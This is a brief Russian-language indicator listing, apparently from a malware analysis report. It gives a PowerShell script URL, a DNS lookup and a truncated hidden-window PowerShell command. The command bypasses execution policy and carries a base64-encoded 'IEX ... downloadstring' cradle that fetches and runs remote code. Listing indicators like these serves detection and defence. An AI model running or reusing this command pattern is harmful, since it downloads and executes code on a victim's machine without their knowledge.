Техническая информация
- https://www.belllaemonella.it/info/f2.ps1
- DNS ASK be####emonella.it
- '<SYSTEM32>\cmd.exe' /c poweRsHelL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwB3... (со скрытым окном)